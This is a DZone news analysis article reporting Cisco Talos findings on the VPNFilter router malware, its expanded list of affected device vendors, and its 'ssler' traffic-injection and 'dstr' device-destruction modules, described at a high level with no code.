DZone
Thanks for visiting DZone today,
Edit Profile
  • Manage Email Subscriptions
  • How to Post to DZone
  • Article Submission Guidelines
Sign Out View Profile
  • Post an Article
  • Manage My Drafts
Over 2 million developers have joined DZone.
Log In / Join
Refcards Trend Reports Events Over 2 million developers have joined DZone. Join Today! Thanks for visiting DZone today,
Edit Profile Manage Email Subscriptions Moderation Admin Console How to Post to DZone Article Submission Guidelines
View Profile
Sign Out
Refcards
Trend Reports
Events
Zones
Culture and Methodologies Agile Career Development Methodologies Team Management
Data Engineering AI/ML Big Data Data Databases IoT
Software Design and Architecture Cloud Architecture Containers Integration Microservices Performance Security
Coding Frameworks Java JavaScript Languages Tools
Testing, Deployment, and Maintenance Deployment DevOps and CI/CD Maintenance Monitoring and Observability Testing, Tools, and Frameworks
Culture and Methodologies
Agile Career Development Methodologies Team Management
Data Engineering
AI/ML Big Data Data Databases IoT
Software Design and Architecture
Cloud Architecture Containers Integration Microservices Performance Security
Coding
Frameworks Java JavaScript Languages Tools
Testing, Deployment, and Maintenance
Deployment DevOps and CI/CD Maintenance Monitoring and Observability Testing, Tools, and Frameworks
  1. DZone
  2. Data Engineering
  3. IoT
  4. VPNFilter Continues to Target More Devices

VPNFilter Continues to Target More Devices

This newly surfaced malware takes hold of your router to conduct Man in the Middle (MiTM) attacks. Read on for further analysis of this new threat.

Karen Minton user avatar by
Karen Minton
·
Jun. 15, 18 · Analysis
Like (1)
Save
Tweet
Share
4.30K Views

Join the DZone community and get the full member experience.

Join For Free

The new type of malware distinguished as VPNFilter is infecting more variants and models of devices and it has new capacities, such as the capability to perform exploits to endpoint devices and invalidate reboots, according to the Cisco Talos reports.

Cisco Talos discovered that VPNFilter had affected a minimum of 500,000 networking devices, largely customer-grade Wi-Fi routers, over 54 nations.

Until a week ago, the devices which were identified to be infected by VPNFilter were MikroTik, Linksys, TP-Link, and Netgear networking equipment in the small and home office environment. This malware has also affected QNAP network-attached storage, commonly abbreviated as NAS, devices.

CiscoTalos updated the list of infected devices in a new blog post to add the devices from companies such as ZTE, Ubiquiti, D-Link, Huawei, Upvel, and Asus. Further devices were also identified from Linksys, Netgear, MikroTik, as well as TP-Link. However, the company owned by Cisco said that no Cisco network devices are infected.

Apart from adding more names of devices to the list, Cisco Talos stated that it found a new stage 3 module dubbed “ssler” which inserts malicious content in the web traffic as it moves across a network device, which enables the actor to perform exploits to endpoints through a Man in the Niddle, or MiTM, attack.

The blog post further added that with this new finding, it could be confirmed that this malware threat goes way beyond what the actor is capable of doing on the network device. It extends the threat into the networks which are supported by an infected network device.

Even though the FBI asked small enterprises and households to reboot their routers immediately, after following the previous reports from Cisco Talos, doing so will not stop the threat since even after a reboot, the ssler renders VPNFilter able to maintain a persistent presence on the affected device.

Ssler renders abilities for data exfiltration as well as JavaScript injection by blocking all the network traffic which passes via the compromised device intended for port 80 — transferring malicious payloads to other devices which are connected to the affected network. Talos anticipates that the ssler module will be performed by applying a parameter list, which defines the behavior of the module and determines the websites which should be targeted.

After this, ssler intercepts all the outgoing web requests via port 80 and they can be scrutinized and altered before being forwarded to the authentic HTTP service.

The other stage 3 module, which is the device destruction module or dstr, gives all of the stage 2 modules which are lacking the kill command the ability to impair the affected device.

It self-destructs and then launches a kill command for the Wi-Fi routers. After that, it removes all of the related files and removes all the traces of VPNFilter from the device before rendering them unusable.

As per Talos, the discoveries have revealed that the threat from the malware continues to increase. Considering that VPNFilter is still out there and finding new ways and devices to expand its spread, it is crucial for people to safeguard their networks and devices. Investing in a robust security program along with a firewall can help you protect your devices from VPNFilter.

Network

Published at DZone with permission of Karen Minton. See the original article here.

Opinions expressed by DZone contributors are their own.

Popular on DZone

  • Utilize OpenAI API to Extract Information From PDF Files
  • AWS Cloud Migration: Best Practices and Pitfalls to Avoid
  • Event Driven 2.0
  • Real-Time Stream Processing With Hazelcast and StreamNative

Comments

Partner Resources

X

ABOUT US

  • About DZone
  • Send feedback
  • Careers
  • Sitemap

ADVERTISE

  • Advertise with DZone

CONTRIBUTE ON DZONE

  • Article Submission Guidelines
  • Become a Contributor
  • Visit the Writers' Zone

LEGAL

  • Terms of Service
  • Privacy Policy

CONTACT US

  • 600 Park Offices Drive
  • Suite 300
  • Durham, NC 27709
  • support@dzone.com
  • +1 (919) 678-0300

Let's be friends: